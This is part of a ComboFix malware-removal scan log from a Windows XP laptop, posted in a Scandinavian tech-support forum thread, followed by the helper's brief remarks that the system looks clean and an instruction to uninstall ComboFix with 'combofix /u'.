2009-09-20 10:07 . 2009-09-20 10:07    --------    d-----w-    c:\documents and settings\Yngve Ralph\Application Data\Malwarebytes
2009-09-20 10:07 . 2009-09-10 12:54    38224    ----a-w-    c:\windows\system32\drivers\mbamswissarmy.sys
2009-09-20 10:07 . 2009-09-20 10:07    --------    d-----w-    c:\documents and settings\All Users\Application Data\Malwarebytes
2009-09-20 10:07 . 2009-09-10 12:53    19160    ----a-w-    c:\windows\system32\drivers\mbam.sys
2009-09-20 10:07 . 2009-09-20 10:07    --------    d-----w-    c:\program files\Malwarebytes' Anti-Malware
2009-09-20 09:45 . 2009-09-20 09:45    --------    d-----w-    c:\program files\CCleaner
2009-09-20 08:44 . 2009-09-20 08:44    --------    d-----w-    c:\program files\Trend Micro
2009-09-18 21:27 . 2009-09-18 21:27    17564    ---ha-w-    c:\windows\system32\mlfcache.dat
2009-09-18 21:19 . 2009-09-18 21:20    --------    d-----w-    c:\program files\Safari
2009-09-18 21:12 . 2009-09-18 21:12    --------    d-----w-    c:\program files\iPod
2009-09-18 21:12 . 2009-09-18 21:21    --------    d-----w-    c:\program files\iTunes
2009-09-18 21:12 . 2009-09-18 21:14    --------    d-----w-    c:\documents and settings\All Users\Application Data\{755AC846-7372-4AC8-8550-C52491DAA8BD}
2009-09-18 21:08 . 2009-09-18 21:09    --------    d-----w-    c:\program files\QuickTime
2009-09-13 08:45 . 2009-09-20 10:16    --------    d-----w-    c:\program files\webserver
2009-08-26 19:48 . 2009-08-26 19:53    --------    d-----w-    c:\documents and settings\Yngve Ralph\Application Data\Spotify
2009-08-26 19:48 . 2009-08-26 19:49    --------    d-----w-    c:\documents and settings\Yngve Ralph\Local Settings\Application Data\Spotify
2009-08-26 19:48 . 2009-08-26 19:48    --------    d-----w-    c:\program files\Spotify

.
((((((((((((((((((((((((((((((((((((((((  Find3M Report  ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2009-09-20 07:55 . 2009-07-09 21:03    --------    d-----w-    c:\documents and settings\LocalService\Application Data\SACore
2009-09-18 21:16 . 2009-08-12 16:24    --------    d-----w-    c:\documents and settings\Yngve Ralph\Application Data\Apple Computer
2009-09-18 21:12 . 2009-08-12 16:19    --------    d-----w-    c:\program files\Common Files\Apple
2009-08-28 17:42 . 2009-08-12 16:19    40448    ----a-w-    c:\windows\system32\drivers\usbaapl.sys
2009-08-28 17:42 . 2009-08-12 16:19    2065696    ----a-w-    c:\windows\system32\usbaaplrc.dll
2009-08-12 16:27 . 2009-08-12 16:27    17536    ----a-w-    c:\documents and settings\Yngve Ralph\Local Settings\Application Data\GDIPFONTCACHEV1.DAT
2009-08-12 16:23 . 2009-08-12 16:22    --------    d-----w-    c:\documents and settings\All Users\Application Data\{8CD7F5AF-ECFA-4793-BF40-D8F42DBFF906}
2009-08-12 16:22 . 2009-08-12 16:20    --------    d-----w-    c:\documents and settings\All Users\Application Data\Apple Computer
2009-08-12 16:22 . 2009-08-12 16:22    --------    d-----w-    c:\program files\Bonjour
2009-08-12 16:20 . 2009-08-12 16:20    --------    d-----w-    c:\program files\Apple Software Update
2009-08-12 16:19 . 2009-08-12 16:19    --------    d-----w-    c:\documents and settings\All Users\Application Data\Apple
2009-08-11 15:06 . 2009-03-27 20:22    --------    d-----w-    c:\program files\McAfee
2009-08-05 10:09 . 2009-08-05 10:06    --------    d-----w-    c:\program files\Comviq Surf Connect
2009-08-05 10:09 . 2009-08-05 10:06    --------    d-----w-    c:\documents and settings\All Users\Application Data\DatacardService
2009-08-05 09:01 . 2009-03-27 18:48    204800    ----a-w-    c:\windows\system32\mswebdvd.dll
2009-07-17 19:01 . 2009-03-27 18:48    58880    ----a-w-    c:\windows\system32\atl.dll
2009-07-13 21:43 . 2009-03-27 18:48    286208    ----a-w-    c:\windows\system32\wmpdxm.dll
2009-07-09 03:03 . 2009-07-09 03:04    410984    ----a-w-    c:\windows\system32\deploytk.dll
2009-07-03 17:09 . 2009-03-27 18:48    915456    ------w-    c:\windows\system32\wininet.dll
.

------- Sigcheck -------

• 2008-06-20 . AD978A1B783B5719720CFF204B666C8E . 361600 . . [5.1.2600.5625] . . c:\windows\$hf_mig$\KB951748\SP3QFE\tcpip.sys
  

• 2008-06-20 . 9AEFA14BD6B182D61E3119FA5F436D3D . 361600 . . [5.1.2600.5625] . . c:\windows\system32\dllcache\tcpip.sys
  

• 2008-06-20 . 9AEFA14BD6B182D61E3119FA5F436D3D . 361600 . . [5.1.2600.5625] . . c:\windows\system32\drivers\tcpip.sys
  

[7] 2008-04-14 . 93EA8D04EC73A85DB02EB8805988F733 . 361344 . . [5.1.2600.5512] . . c:\windows\$NtUninstallKB951748$\tcpip.sys

• 2008-07-07 20:26 . D4991D98F2DB73C60D042F1AEF79EFAE . 253952 . . [2001.12.4414.706] . . c:\windows\system32\es.dll
  

• 2008-07-07 20:26 . D4991D98F2DB73C60D042F1AEF79EFAE . 253952 . . [2001.12.4414.706] . . c:\windows\system32\dllcache\es.dll
  

• 2008-07-07 20:23 . F17F6226BDC0CD5F0BEF0DAF84D29BEC . 253952 . . [2001.12.4414.706] . . c:\windows\$hf_mig$\KB950974\SP3QFE\es.dll
  

[7] 2008-04-14 12:00 . 19A799805B24990867B00C120D300C3A . 246272 . . [2001.12.4414.701] . . c:\windows\$NtUninstallKB950974$\es.dll

• 2009-03-21 . B921FB870C9AC0D509B2CCABBBBE95F3 . 989696 . . [5.1.2600.5781] . . c:\windows\system32\kernel32.dll
  

• 2009-03-21 . B921FB870C9AC0D509B2CCABBBBE95F3 . 989696 . . [5.1.2600.5781] . . c:\windows\system32\dllcache\kernel32.dll
  

• 2009-03-21 . DA11D9D6ECBDF0F93436A4B7C13F7BEC . 991744 . . [5.1.2600.5781] . . c:\windows\$hf_mig$\KB959426\SP3QFE\kernel32.dll
  

[7] 2008-04-14 . C24B983D211C34DA8FCC1AC38477971D . 989696 . . [5.1.2600.5512] . . c:\windows\$NtUninstallKB959426$\kernel32.dll

• 2008-06-20 . 832E4DD8964AB7ACC880B2837CB1ED20 . 245248 . . [5.1.2600.5625] . . c:\windows\system32\mswsock.dll
  

• 2008-06-20 . 832E4DD8964AB7ACC880B2837CB1ED20 . 245248 . . [5.1.2600.5625] . . c:\windows\system32\dllcache\mswsock.dll
  

• 2008-06-20 . FCEE5FCB99F7C724593365C706D28388 . 245248 . . [5.1.2600.5625] . . c:\windows\$hf_mig$\KB951748\SP3QFE\mswsock.dll
  

[7] 2008-04-14 . B4138E99236F0F57D4CF49BAE98A0746 . 245248 . . [5.1.2600.5512] . . c:\windows\$NtUninstallKB951748$\mswsock.dll
.
(((((((((((((((((((((((((((((  SnapShot@2009-09-21_08.47.27  )))))))))))))))))))))))))))))))))))))))))
.
+ 2009-03-27 20:10 . 2009-09-21 11:56    32768              c:\windows\system32\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5\index.dat
- 2009-03-27 20:10 . 2009-09-21 07:16    32768              c:\windows\system32\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5\index.dat
+ 2009-03-27 20:10 . 2009-09-21 11:56    32768              c:\windows\system32\config\systemprofile\Local Settings\History\History.IE5\index.dat
- 2009-03-27 20:10 . 2009-09-21 07:16    32768              c:\windows\system32\config\systemprofile\Local Settings\History\History.IE5\index.dat
+ 2009-09-20 12:46 . 2009-09-21 11:56    16384              c:\windows\system32\config\systemprofile\Cookies\index.dat
- 2009-09-20 12:46 . 2009-09-21 07:16    16384              c:\windows\system32\config\systemprofile\Cookies\index.dat
.
(((((((((((((((((((((((((((((((((((((  Reg Loading Points  ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"swg"="c:\program files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe" [2009-03-27 39408]
"MSMSGS"="c:\program files\Messenger\msmsgs.exe" [2008-04-14 1695232]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SunJavaUpdateSched"="c:\program files\Java\jre6\bin\jusched.exe" [2009-07-09 148888]
"EDS"="c:\program files\Samsung\Samsung EDS\EDSAgent.exe" [2007-12-21 659456]
"Chrome3"="c:\program files\s3graphics\chrome3\Chrome3.exe" [2009-04-30 1274368]
"SynTPEnh"="c:\program files\Synaptics\SynTP\SynTPEnh.exe" [2008-08-28 1044480]
"SUPBackGround"="c:\program files\Samsung\Samsung Update Plus\SUPBackGround.exe" [2008-12-04 298664]
"Adobe Reader Speed Launcher"="c:\program files\Adobe\Reader 9.0\Reader\Reader_sl.exe" [2008-06-12 34672]
"BatteryManager"="c:\program files\Samsung\Samsung Battery Manager\BatteryManager.exe" [2008-11-27 2768896]
"DMHotKey"="c:\program files\Samsung\Easy Display Manager\DMLoader.exe" [2006-12-27 466944]
"MagicKeyboard"="c:\program files\SAMSUNG\MagicKBD\PreMKBD.exe" [2006-05-15 151552]
"mcagent_exe"="c:\program files\McAfee.com\Agent\mcagent.exe" [2008-10-31 641208]
"UCam_Menu"="c:\program files\CyberLink\YouCam\MUITransfer\MUIStartMenu.exe" [2008-12-03 218408]
"QuickTime Task"="c:\program files\QuickTime\QTTask.exe" [2009-09-04 417792]
"iTunesHelper"="c:\program files\iTunes\iTunesHelper.exe" [2009-09-08 305440]
"Malwarebytes Anti-Malware (reboot)"="c:\program files\Malwarebytes' Anti-Malware\mbam.exe" [2009-09-10 1312080]
"RTHDCPL"="RTHDCPL.EXE" - c:\windows\RTHDCPL.EXE [2008-11-17 17676288]

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
"CTFMON.EXE"="c:\windows\system32\CTFMON.EXE" [2008-04-14 15360]

c:\documents and settings\Yngve Ralph\Start Menu\Programs\Startup\
OpenOffice.org 3.1.lnk - c:\program files\OpenOffice.org 3\program\quickstart.exe [2009-4-16 384000]

c:\documents and settings\All Users\Start Menu\Programs\Startup\
Bluetooth.lnk - c:\program files\WIDCOMM\Bluetooth Software\BTTray.exe [2008-9-17 580200]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcmscsvc]
@=""

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS]
@=""

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys]
@="Driver"

[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\McAfeeAntiVirus]
"DisableMonitoring"=dword:00000001

[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\McAfeeFirewall]
"DisableMonitoring"=dword:00000001

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile]
"EnableFirewall"= 0 (0x0)

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\Network Diagnostic\\xpnetdiag.exe"=
"%windir%\\system32\\sessmgr.exe"=
"c:\\WINDOWS\\system32\\dpvsetup.exe"=
"c:\\Program Files\\Common Files\\McAfee\\MNA\\McNASvc.exe"=
"c:\\Program Files\\Bonjour\\mDNSResponder.exe"=
"c:\\Program Files\\Spotify\\spotify.exe"=
"c:\\Program Files\\iTunes\\iTunes.exe"=

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\GloballyOpenPorts\List]
"8085:TCP"= 8085:TCP:ddnsfilter
"53:TCP"= 53:TCP:webserver

R2 DOSMEMIO;MEMIO;c:\windows\system32\MEMIO.SYS [2009-03-27 4300]
R2 McAfee SiteAdvisor Service;McAfee SiteAdvisor Service;c:\program files\McAfee\SiteAdvisor\McSACore.exe [2009-03-27 203280]
R2 S3Funkey;S3Funkey;c:\program files\s3graphics\chrome3\S3Funkey.svc [2009-04-30 444416]
R2 S3LoadSv;S3LoadSv;c:\program files\s3graphics\chrome3\s3loadsv.svc [2009-04-30 387072]
R2 yksvc;Marvell Yukon Service;RUNDLL32.EXE ykx32mpcoinst,serviceStartProc --> RUNDLL32.EXE ykx32mpcoinst,serviceStartProc [?]
R3 DNSeFilter;DNSeFilter;c:\windows\system32\drivers\SamsungEDS.SYS [2008-01-15 30208]
R3 S3GIGP;S3GIGP;c:\windows\system32\drivers\S3gIGPm.sys [2009-03-27 581632]
R3 vcrdrx32;VIA MSP Cardreader Host Controller;c:\windows\system32\drivers\vcrdrx32.sys [2009-03-27 90752]
R3 VMC326;Vimicro Camera Service VMC326;c:\windows\system32\drivers\VMC326.sys [2009-03-27 238464]
S1 Filter;Filter;\??\c:\windows\system32\drivers\Filter.sys --> c:\windows\system32\drivers\Filter.sys [?]
S2 DCSHost.exe;DCSHost.exe;c:\documents and settings\All Users\Application Data\DatacardService\DCSHOST.exe [2009-08-05 110592]
S3 hwusbfake;Huawei DataCard USB Fake;c:\windows\system32\drivers\ewusbfake.sys [2009-08-05 102656]

[HKEY_LOCAL_MACHINE\software\microsoft\active setup\installed components\>{60B49E34-C7CC-11D0-8953-00A0C90347FF}]
"c:\windows\system32\rundll32.exe" "c:\windows\system32\iedkcs32.dll",BrandIEActiveSetup SIGNUP
.
Contents of the 'Scheduled Tasks' folder

2009-08-24 c:\windows\Tasks\AppleSoftwareUpdate.job
- c:\program files\Apple Software Update\SoftwareUpdate.exe [2008-07-30 10:34]

2009-03-27 c:\windows\Tasks\McDefragTask.job
- c:\progra~1\mcafee\mqc\QcConsol.exe [2009-03-27 08:32]

2009-03-27 c:\windows\Tasks\McQcTask.job
- c:\progra~1\mcafee\mqc\QcConsol.exe [2009-03-27 08:32]

2009-09-21 c:\windows\Tasks\User_Feed_Synchronization-{4C2CC653-8D8B-4747-B339-A00CA8CB617E}.job
- c:\windows\system32\msfeedssync.exe [2009-03-08 02:31]
.
.
------- Supplementary Scan -------
.
uStart Page = hxxp://www.google.com/ig/redirectdomain?brand=SMSN&bmod=SMSN
uInternet Settings,ProxyOverride = *.local
uSearchURL,(Default) = hxxp://www.google.com/search?q=%s
IE: Send to &Bluetooth Device... - c:\program files\WIDCOMM\Bluetooth Software\btsendto_ie_ctx.htm
IE: Send To Bluetooth - c:\program files\WIDCOMM\Bluetooth Software\btsendto_ie.htm
.

**************************************************************************

catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2009-09-21 15:32
Windows 5.1.2600 Service Pack 3 NTFS

scanning hidden processes ... 

scanning hidden autostart entries ...

scanning hidden files ... 

scan completed successfully
hidden files: 0

**************************************************************************

[HKEY_LOCAL_MACHINE\System\ControlSet001\Services\S3Funkey]
"ImagePath"="c:\program files\s3graphics\chrome3\s3funkey.svc"

[HKEY_LOCAL_MACHINE\System\ControlSet001\Services\S3LoadSv]
"ImagePath"="c:\program files\s3graphics\chrome3\s3loadsv.svc"
.
--------------------- LOCKED REGISTRY KEYS ---------------------

[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\WINDOWS\\system32\\Macromed\\Flash\\FlashUtil10c.exe,-101"

[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}\Elevation]
"Enabled"=dword:00000001

[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}\LocalServer32]
@="c:\\WINDOWS\\system32\\Macromed\\Flash\\FlashUtil10c.exe"

[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"

[HKEY_LOCAL_MACHINE\software\Classes\Interface\{1D4C8A81-B7AC-460A-8C23-98713C41D6B3}]
@Denied: (A 2) (Everyone)
@="IFlashBroker3"

[HKEY_LOCAL_MACHINE\software\Classes\Interface\{1D4C8A81-B7AC-460A-8C23-98713C41D6B3}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"

[HKEY_LOCAL_MACHINE\software\Classes\Interface\{1D4C8A81-B7AC-460A-8C23-98713C41D6B3}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
--------------------- DLLs Loaded Under Running Processes ---------------------

- - - - - - - > 'explorer.exe'(2196)
c:\windows\system32\WININET.dll
c:\program files\McAfee\SiteAdvisor\saHook.dll
c:\windows\system32\btmmhook.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\webcheck.dll
c:\windows\system32\WPDShServiceObj.dll
c:\windows\system32\PortableDeviceTypes.dll
c:\windows\system32\PortableDeviceApi.dll
.
Completion time: 2009-09-21 15:34
ComboFix-quarantined-files.txt  2009-09-21 13:34
ComboFix2.txt  2009-09-20 12:05

Pre-Run: 61 115 314 176 bytes free
Post-Run: 61 103 661 056 bytes free

220    --- E O F ---    2009-09-21 07:09

DEt ser fint ud. Hvorfor bruger du ikke Windows automatiske tids stilling?

Det gör jeg også nu...mange tak for hjälpen

f-arn, kan du gi et svar så du kan få dine velfortjente point.

Et svar :)

Lige en sidste ting. En smule oprydning. Klik start, kør/run og kopier følgnde ind:
combofix /u